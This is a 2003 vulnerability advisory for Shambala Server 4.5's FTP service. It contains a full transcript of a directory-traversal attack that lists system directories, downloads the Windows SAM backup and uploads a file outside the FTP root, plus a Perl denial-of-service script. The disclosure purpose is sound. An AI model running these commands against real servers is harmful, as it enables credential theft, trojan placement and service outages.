Multiple vulnerabilities found in Shambala Server version 4.5 (FTP Service) Discovered by Dennis Rand ------------------------------------------------------------------------ -----[SUMMARY Shambala is an easy to use communications server featuring the ability to serve and access web sites, ftp sites, and chat rooms. Using Shambala, you can quickly create a web site and host it from any PC. Shambala doesn't require NT and its installation is non-invasive. Shambala features a WYSIWYG DHTML editor for placing text and props on your web pages. The editor includes a navigation feature that allows you to express your web site as a geographical area and allow your users to move easily between areas. This feature also exists in the editor so you can create a space quickly without worrying about maintaining hyperlinks between areas. Shambala is drag and drop based allowing you to perfectly size and position your web page elements. You can use a page you are editing as an interactive whiteboard and chat space. When you move a prop or edit text, people connected to your workspace will receive the change that you make. Their workspace is automatically updated to be a mirror image of yours. If any machine in the group decides to leave, nothing is lost since each subscriber receives a full copy of the web page document being used as a workspace. This powerful feature can be used for interactive classrooms, games, demonstrations, even internet based group workshops. To transfer files, Shambala has an integrated ftp client and ftp server. The ftp server provides high performance access to shared files. You can also manage the security of the ftp site. The client can browse, download, and upload files to any ftp server. It can even automatically download everything on a remote ftp site. Shambala pushes the envelope of what you can do with web technology. It supports the existing infrastructure of the web but also provides powerful features that allow you to shape the future and evolution of cyberspace. A directory traversal vulnerability in the product allows remote attackers to cause the server to traverse into directories that reside outside the bounding FTP root directory. The server is also Vulnerable for DoS attack. -----[DETAILS Vulnerable systems: Windows NT 4.0 and Windows 2000 server fully patched * Shambala Server version 4.5 Immune systems: * None Shambala Will not fix any errors they don't think there is any problems. Shambala Server failure to filter out "\.." and "/.." sequences in specific command requests allowing a remote users to break out of restricted directories and gain read access to the system directory structure; Possibility for discovering the directory structure outside the configured areas, It is also possible to get files from outside the configured areas, and the part that could be even worse is that you can send files to places outside the configures areas, so a Trojan could be placed. The following transcript demonstrates a sample exploitation of the vulnerabilities: C:\>ftp ftp> open To 192.168.1.199 Connected to 192.168.1.199. 220 winnt40 - Shambala FTP Server Ready. User (192.168.1.199:(none)): anonymous 331 Password required for anonymous. Password: 230 User anonymous logged in. ftp> ls 200 PORT command successful. 150 Opening data connection. 192.168.1.199 index-_-1_0_0.htm index-_0_0_0.htm index-_0_1_0.htm pwd.pl 226 Transfer complete. ftp: 78 bytes received in 0,00Seconds 78000,00Kbytes/sec. ftp> cd .. 550 Requested action not taken. Permission denied. ftp> cd / 257 CWD command successful. ftp> ls 200 PORT command successful. 150 Opening data connection. 192.168.1.199 index-_-1_0_0.htm index-_0_0_0.htm index-_0_1_0.htm pwd.pl 226 Transfer complete. ftp: 78 bytes received in 0,00Seconds 78000,00Kbytes/sec. ftp> cd \..\ 550 Requested action not taken. Permission denied. ftp> ls 200 PORT command successful. 150 Opening data connection. 192.168.1.199 index-_-1_0_0.htm index-_0_0_0.htm index-_0_1_0.htm pwd.pl 226 Transfer complete. ftp: 78 bytes received in 0,01Seconds 7,80Kbytes/sec. ftp> ls \..\..\..\..\..\..\..\..\..\..\ 200 PORT command successful. 150 Opening data connection. AUTOEXEC.BAT CONFIG.SYS I386 Inetpub Installationsfiler til Windows Update Multimedia Files OptionPack pagefile.sys Program Files pwd.pl Shambala Server 4.5 TEMP WINNT 226 Transfer complete. ftp: 181 bytes received in 0,03Seconds 6,03Kbytes/sec. ftp> ls \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\ 200 PORT command successful. 150 Opening data connection. autoexec.nt config.nt default._ ntuser.da_ sam._ security._ setup.log software._ system._ 226 Transfer complete. ftp: 99 bytes received in 0,06Seconds 1,65Kbytes/sec. ftp> get \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\sam._ 200 PORT command successful. 150 Opening data connection. 226 Transfer complete. ftp: 3196 bytes received in 0,00Seconds 3196000,00Kbytes/sec. ftp> send pwd.pl \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\test.pl 200 PORT command successful. 150 Opening data connection. 226 Transfer complete. ftp: 3849 bytes sent in 0,00Seconds 3849000,00Kbytes/sec. ftp> bye 221 Goodbye. -----[EXPLOIT CODE The second attack type is a DoS attack that will kill the server application. ------------------------------------- Cut Here ------------------------------------------ #!/usr/bin/perl # # Shambala Server version 4.5 # http://www.evolvable.com # # What happens when this exploit is send the server crashes # with a error message on the server. # # __________________________ # | Run-time error '20127': | # |Invalid ConnectionID | # ---------------------------- # # ---------------------------------------------------------- # Disclaimer: this file is intended as proof of concept, and # is not intended to be used for illegal purposes. I accept # no responsibility for damage incurred by the use of it. # ---------------------------------------------------------- # # # use Net::FTP; $target = shift() || die "usage: target ip"; my $user = "anonymous"; my $pass = "mail\@mail.com"; system('cls'); print "Shambala Server version 4.5 DoS attack\n"; print "Trying to connect and destroy target system at: $target...\n"; $ftp = Net::FTP->new($target, Debug => 1, Port => 21) || die "could not connect: $!"; $ftp->login($user, $pass) || die "could not login: $!"; $ftp->cwd("/"); $ftp->quit; ------------------------------------- Cut Here ------------------------------------------ -----[DETECTION Shambala Server version 4.5 is vulnerable to the above-described attacks. Earlier versions may be susceptible as well. To determine if a specific implementation is vulnerable, experiment by following the above transcript. -----[VENDOR RESPONSE Shambala Server version 4.xx fixes this issue. The latest version is available from http://www.evolvable.com -----[DISCLOSURE TIMELINE 18/11/2002 Found the Vulnerability. 19/11/2002 Author notified. Send mail to webmaster@evolvable.com and help@evolvable.com 18/01/2003 Responses received from evolvable 18/01/2003 Public Disclosure. -----[ADDITIONAL INFORMATION The vulnerability was discovered by Dennis Rand -----[DISCLAIMER The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.